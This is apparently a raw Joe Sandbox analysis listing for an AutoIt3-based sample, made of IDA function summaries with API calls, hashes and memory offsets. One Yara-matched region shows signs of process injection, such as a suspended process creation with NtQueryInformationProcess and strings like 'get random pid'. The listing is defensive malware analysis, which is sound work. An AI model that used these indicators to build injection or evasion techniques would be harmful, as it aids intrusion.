                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                      • API String ID: 2574300362-4033151799
                                      • Opcode ID: 220de269be8d37bbe57e552e9079888d6581f579c82c36ce4938afa5b9cd4837
                                      • Instruction ID: 77fd57551850d60f8bfab42306ab143854e26662f714912f7f318fc354e4d773
                                      • Opcode Fuzzy Hash: 220de269be8d37bbe57e552e9079888d6581f579c82c36ce4938afa5b9cd4837
                                      • Instruction Fuzzy Hash: 84D017305107128FDB20AF75D80864676E9FF06395B15CC2A94E6E2660EB74D8C0CB24
                                      APIs
                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00815E3D), ref: 008155FE
                                      • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00815610
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: GetNativeSystemInfo$kernel32.dll
                                      • API String ID: 2574300362-192647395
                                      • Opcode ID: 733145756e3918cbb7582a20b8cfbc1ce068fe558fc734961f9204885d2dee00
                                      • Instruction ID: 6e5e799ded6a6a59e105583ac045e7f20aeb5cd2ed2c6035ce35f3be5eb2d0df
                                      • Opcode Fuzzy Hash: 733145756e3918cbb7582a20b8cfbc1ce068fe558fc734961f9204885d2dee00
                                      • Instruction Fuzzy Hash: C0D01275510712CFD7206FB1DC486567AD8FF54355F19882AD4A5D2251D774C4C0CE90
                                      APIs
                                      • LoadLibraryA.KERNEL32(kernel32.dll,00000001,008793DE,?,00890980), ref: 008797D8
                                      • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 008797EA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: GetModuleHandleExW$kernel32.dll
                                      • API String ID: 2574300362-199464113
                                      • Opcode ID: 0cdb07041ffbc02f2ac2eacb3a635b15d8e62e5f40d43e7e080d6859d74c809c
                                      • Instruction ID: 8ebe9a25c3f2a0550184097d0584d80a02f948f73d35b881083885ed111fe397
                                      • Opcode Fuzzy Hash: 0cdb07041ffbc02f2ac2eacb3a635b15d8e62e5f40d43e7e080d6859d74c809c
                                      • Instruction Fuzzy Hash: 8BD01270510713CFD720AF71D88864676D5FF04391B15C82AD4E9D2250DB74C480CA11
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 52fbecbcccca18550663c1d95f22bec3f432e23142b1959c87cd26fef6e51650
                                      • Instruction ID: b4456e2c992814f88fa611e415c4d6c0093fe4a6015b5545ddec700e7beaab0b
                                      • Opcode Fuzzy Hash: 52fbecbcccca18550663c1d95f22bec3f432e23142b1959c87cd26fef6e51650
                                      • Instruction Fuzzy Hash: 21C18F75A0021AEFCB14CF98C884EAEB7B5FF48715B108599EC05EB251DB31ED89CB90
                                      APIs
                                      • CharLowerBuffW.USER32(?,?), ref: 0087E7A7
                                      • CharLowerBuffW.USER32(?,?), ref: 0087E7EA
                                        • Part of subcall function 0087DE8E: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0087DEAE
                                      • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0087E9EA
                                      • _memmove.LIBCMT ref: 0087E9FD
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: BuffCharLower$AllocVirtual_memmove
                                      • String ID:
                                      • API String ID: 3659485706-0
                                      • Opcode ID: 2b3dc6c7782bb30b8b28e370958fd035974b21310ccb3084b0c7e0c5aa33460b
                                      • Instruction ID: 1881acd2ed61c6e351fdc268c92c0c6a01c9a9a88d9c72e046d4597d01624e77
                                      • Opcode Fuzzy Hash: 2b3dc6c7782bb30b8b28e370958fd035974b21310ccb3084b0c7e0c5aa33460b
                                      • Instruction Fuzzy Hash: A9C14771A083119FC754DF28C48096ABBE4FF89714F0489AEF999DB351D731E945CB82
                                      APIs
                                      • CoInitialize.OLE32(00000000), ref: 008787AD
                                      • CoUninitialize.OLE32 ref: 008787B8
                                        • Part of subcall function 0088DF09: CoCreateInstance.OLE32(00000018,00000000,00000005,00000028,?,?,?,?,?,00000000,00000000,00000000,?,00878A0E,?,00000000), ref: 0088DF71
                                      • VariantInit.OLEAUT32(?), ref: 008787C3
                                      • VariantClear.OLEAUT32(?), ref: 00878A94
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                      • String ID:
                                      • API String ID: 780911581-0
                                      • Opcode ID: 69e78c54fa2648c46150af5fb27545b3662fc6700e5ccb1a15f31e1618461750
                                      • Instruction ID: f4eb6fb625f47d7e6fb3c9b76a14d253aefabff2a835cd397655068607f50bc6
                                      • Opcode Fuzzy Hash: 69e78c54fa2648c46150af5fb27545b3662fc6700e5ccb1a15f31e1618461750
                                      • Instruction Fuzzy Hash: 68A10475644A119FD750EF18C885A2AB7E4FF88354F148859FA99DB3A1CB30ED40CB92
                                      APIs
                                      • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00893C4C,?), ref: 00858308
                                      • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00893C4C,?), ref: 00858320
                                      • CLSIDFromProgID.OLE32(?,?,00000000,00890988,000000FF,?,00000000,00000800,00000000,?,00893C4C,?), ref: 00858345
                                      • _memcmp.LIBCMT ref: 00858366
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: FromProg$FreeTask_memcmp
                                      • String ID:
                                      • API String ID: 314563124-0
                                      • Opcode ID: fa74da81b0348dfb30fbebe1318f0e15af279d6129a04da344c8d213a95f93c4
                                      • Instruction ID: c957077c43cb69e478b879ac7a9ad61db33128b08672c6dcf1238da9cb5e509d
                                      • Opcode Fuzzy Hash: fa74da81b0348dfb30fbebe1318f0e15af279d6129a04da344c8d213a95f93c4
                                      • Instruction Fuzzy Hash: 3E810971A00109EFCB04DF94C888EEEBBB9FF89316F144559E515EB250DB71AE09CB60
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Variant$AllocClearCopyInitString
                                      • String ID:
                                      • API String ID: 2808897238-0
                                      • Opcode ID: 463925f6669f608a4c026d3c426a54f01ba7e1b07f8bff3278e8350cfc370696
                                      • Instruction ID: 65bf212629f45b81f0a79d1d0a3d2450a9cdf6427e917c074185a7004bc7e318
                                      • Opcode Fuzzy Hash: 463925f6669f608a4c026d3c426a54f01ba7e1b07f8bff3278e8350cfc370696
                                      • Instruction Fuzzy Hash: F651BA706087059BDB209F7DEC95A2DB7E9FF54315B20D81FE946C72D2EB3098888B16
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 0087F526
                                      • Process32FirstW.KERNEL32(00000000,?), ref: 0087F534
                                        • Part of subcall function 00811A36: _memmove.LIBCMT ref: 00811A77
                                      • Process32NextW.KERNEL32(00000000,?), ref: 0087F5F4
                                      • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0087F603
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                      • String ID:
                                      • API String ID: 2576544623-0
                                      • Opcode ID: 928e08bc9fd6aaf0cf94ee1176c45ed9c3a6d731ec180adb8aec722aa7c90aba
                                      • Instruction ID: 54c54e02fc3be5aa60dd05b30a50236c00ca943bfa2b411255b235d92ac1e1c4
                                      • Opcode Fuzzy Hash: 928e08bc9fd6aaf0cf94ee1176c45ed9c3a6d731ec180adb8aec722aa7c90aba
                                      • Instruction Fuzzy Hash: ED514AB11043119FD710EF28DC86AABB7E8FF94740F00492DF695D62A2EB709904CB92
                                      APIs
                                      • GetWindowRect.USER32(00EAF0A0,?), ref: 00889E88
                                      • ScreenToClient.USER32(00000002,00000002), ref: 00889EBB
                                      • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00889F28
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Window$ClientMoveRectScreen
                                      • String ID:
                                      • API String ID: 3880355969-0
                                      • Opcode ID: 8d7e006e2fe2b8171ead72dd850556ed8b6e1634743f2dbc1d2379b56c082b6f
                                      • Instruction ID: 383cd27e0e5d708872414d7e1e37ef5ad1f0a71943bd05de477d5459afeb447a
                                      • Opcode Fuzzy Hash: 8d7e006e2fe2b8171ead72dd850556ed8b6e1634743f2dbc1d2379b56c082b6f
                                      • Instruction Fuzzy Hash: 41513D30A00209AFCB24EF58C884DBE7BB6FB54320F148269F965D72A0DB70AD41CF90
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                      • String ID:
                                      • API String ID: 2782032738-0
                                      • Opcode ID: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
                                      • Instruction ID: a42768e06b73433cd0ab9ced469a903061f55863ef69c098e866d252ac5f52d5
                                      • Opcode Fuzzy Hash: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
                                      • Instruction Fuzzy Hash: 5441B33160173AABDF28CF69E8809AF7BA5FF40364B24913DE856C7650DB719DC08B64
                                      APIs
                                      • Sleep.KERNEL32(00001388,00000000,03CF02F1,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 03CF01C3
                                        • Part of subcall function 03CEC8D4: GetCurrentProcessId.KERNEL32(?,00000000,03CECBE5), ref: 03CEC954
                                        • Part of subcall function 03CECBF4: GetCurrentProcessId.KERNEL32(?,00000000,03CECE48,?,00000000), ref: 03CECC6A
                                        • Part of subcall function 03CECBF4: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000000,03CECE48,?,00000000), ref: 03CECD37
                                        • Part of subcall function 03CECBF4: NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,?), ref: 03CECD4F
                                        • Part of subcall function 03CEFEF0: CloseHandle.KERNEL32(?), ref: 03CF00AF
                                        • Part of subcall function 03CF82D8: GetFileAttributesA.KERNELBASE(00000000,?,?,?,?,03CF5166,?,03CEA59B,00000000,03CEA5FE,?,00000000,00000000,00000000,00000000,00000000), ref: 03CF831A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_3cc1000_Autoit3.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$Current$AttributesCloseCreateFileHandleInformationQuerySleep
                                      • String ID: c:\debugg$get random pid $lp.txt
                                      • API String ID: 761091095-3996086189
                                      • Opcode ID: 8107c8bdddadc2e8124c81629cc77a3f1b33082a70b64b0cdd6f36e86180c9b9
                                      • Instruction ID: a7addb15e8d998d01d1c474764a2aca78f8416a3954547e9d7681b7bab3bfc0d
                                      • Opcode Fuzzy Hash: 8107c8bdddadc2e8124c81629cc77a3f1b33082a70b64b0cdd6f36e86180c9b9
                                      • Instruction Fuzzy Hash: 2841A579A003598FDBA1FBA4C941AAF7369BF55640B178065EA00EF352CB30EE05E771
                                      APIs
                                      • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0085A68A
                                      • __itow.LIBCMT ref: 0085A6BB
                                        • Part of subcall function 0085A90B: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0085A976
                                      • SendMessageW.USER32(?,0000110A,00000001,?), ref: 0085A724
                                      • __itow.LIBCMT ref: 0085A77B
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: MessageSend$__itow
                                      • String ID:
                                      • API String ID: 3379773720-0
                                      • Opcode ID: ca08e3d3bd16fc4ae18b6a672ace63ce445d22e29740f3f2454dd52ebf811378
                                      • Instruction ID: 2ce0ac60b095defb7582d4ff5ab4a5957c8e5f29d0f72d1ebe9447b3dab6c967
                                      • Opcode Fuzzy Hash: ca08e3d3bd16fc4ae18b6a672ace63ce445d22e29740f3f2454dd52ebf811378
                                      • Instruction Fuzzy Hash: CE417374A00209ABDF15EF54C899BEE7BB9FF58751F040059FD15E3281DB709A88CAA3
                                      APIs
                                      • socket.WSOCK32(00000002,00000002,00000011), ref: 008770BC
                                      • WSAGetLastError.WSOCK32(00000000), ref: 008770CC
                                        • Part of subcall function 00804D37: __itow.LIBCMT ref: 00804D62
                                        • Part of subcall function 00804D37: __swprintf.LIBCMT ref: 00804DAC
                                      • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00877130
                                      • WSAGetLastError.WSOCK32(00000000), ref: 0087713C
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: ErrorLast$__itow__swprintfsocket
                                      • String ID:
                                      • API String ID: 2214342067-0
                                      • Opcode ID: d71d33bfd36ef8ff1eea42500aafaa0763f65c0ca375106be520becc15f78369
                                      • Instruction ID: d1f6f4cd305126d999b5dc28a9ac11491ff605408e6df8e1e8e4d41344423e0a
                                      • Opcode Fuzzy Hash: d71d33bfd36ef8ff1eea42500aafaa0763f65c0ca375106be520becc15f78369
                                      • Instruction Fuzzy Hash: AB4161B5780200AFE760AF68DC87F6A77A4FB04B14F548458FA59DB3D2DA719D008B92
                                      APIs
                                      • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00890980), ref: 00876B92
                                      • _strlen.LIBCMT ref: 00876BC4
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: _strlen
                                      • String ID:
                                      • API String ID: 4218353326-0
                                      • Opcode ID: 1bdb299fed25a785b0e42fea3ac2bab006677ec9301df82d5b694257229901f0
                                      • Instruction ID: 227fd996e8830af8dcb2fc69cc3b112c22803c70e3df0b1d5f9e98e5d27c344d
                                      • Opcode Fuzzy Hash: 1bdb299fed25a785b0e42fea3ac2bab006677ec9301df82d5b694257229901f0
                                      • Instruction Fuzzy Hash: 3841DF71600508AFCB04FBA8DC95EAEB7A9FF54310F148155F91ADB292EB30ED51CB92
                                      APIs
                                      • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 03CCF463
                                      • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 03CCF47F
                                      • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 03CCF4F6
                                      • VariantClear.OLEAUT32(?), ref: 03CCF51F
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_3cc1000_Autoit3.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ArraySafe$Bound$ClearIndexVariant
                                      • String ID:
                                      • API String ID: 920484758-0
                                      • Opcode ID: 45d0f3985057229b3475333d862641383efb44316ef2fb9ceb622db2627beb4c
                                      • Instruction ID: 29d1934b5f8fd58483e8b8a20b4942f69aaf97398230e32f220c1200efa851ab
                                      • Opcode Fuzzy Hash: 45d0f3985057229b3475333d862641383efb44316ef2fb9ceb622db2627beb4c
                                      • Instruction Fuzzy Hash: 60411979A103599FCB61DB58CC90BC9B3BDAF49200F0541EDE649EB211DA30AF819F60
                                      APIs
                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0086BEE1
                                      • GetLastError.KERNEL32(?,00000000), ref: 0086BF07
                                      • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0086BF2C
                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0086BF58
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: CreateHardLink$DeleteErrorFileLast
                                      • String ID:
                                      • API String ID: 3321077145-0
                                      • Opcode ID: eab70b46c01b8f79df33d8c599ae0986a36dc92df53abf50f015d91a90d98be8
                                      • Instruction ID: 9be0145aacf8c4b85c8b6b98e44ca569a97561b4827af6ee2793c587f9dae5ae
                                      • Opcode Fuzzy Hash: eab70b46c01b8f79df33d8c599ae0986a36dc92df53abf50f015d91a90d98be8
                                      • Instruction Fuzzy Hash: 58410775600A10DFCB11EF59C885A59BBE1FF49314B198498ED49DB3A2CB31FD42CB92
                                      APIs
                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00888F03
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: InvalidateRect
                                      • String ID:
                                      • API String ID: 634782764-0
                                      • Opcode ID: a94fb1b37961b7ee11486e93e25e642c0b028fa3eb010f9e81a632d974bdc92a
                                      • Instruction ID: 4d87d39b07410e5c9c4229a3b1090c8f95d93771f71037426721cf673385fe4d
                                      • Opcode Fuzzy Hash: a94fb1b37961b7ee11486e93e25e642c0b028fa3eb010f9e81a632d974bdc92a
                                      • Instruction Fuzzy Hash: DB319C34604209EEEB30BA58CC49FA837A6FB09324F944512FB51E62A1DF71ED50DB51
                                      APIs
                                      • ClientToScreen.USER32(01183D90,?), ref: 0088B1D2
                                      • GetWindowRect.USER32(?,?), ref: 0088B248
                                      • PtInRect.USER32(?,?,0088C6BC), ref: 0088B258
                                      • MessageBeep.USER32(00000000), ref: 0088B2C9
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Rect$BeepClientMessageScreenWindow
                                      • String ID:
                                      • API String ID: 1352109105-0
                                      • Opcode ID: c4b0ab6a7a358149c2bee520b597fae0cb40ba65dee8df5313e4c86aec3e4b16
                                      • Instruction ID: 2d606ba18d8df9d9e4478baa2cbc91052f71fdb6629349bf40d7d14b4f079d8e
                                      • Opcode Fuzzy Hash: c4b0ab6a7a358149c2bee520b597fae0cb40ba65dee8df5313e4c86aec3e4b16
                                      • Instruction Fuzzy Hash: 91415D30A04219DFDB21EF98C884EAD7BF5FF89315F1885A9E928DB265D730A941CF50
                                      APIs
                                      • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00861326
                                      • SetKeyboardState.USER32(00000080,?,00000001), ref: 00861342
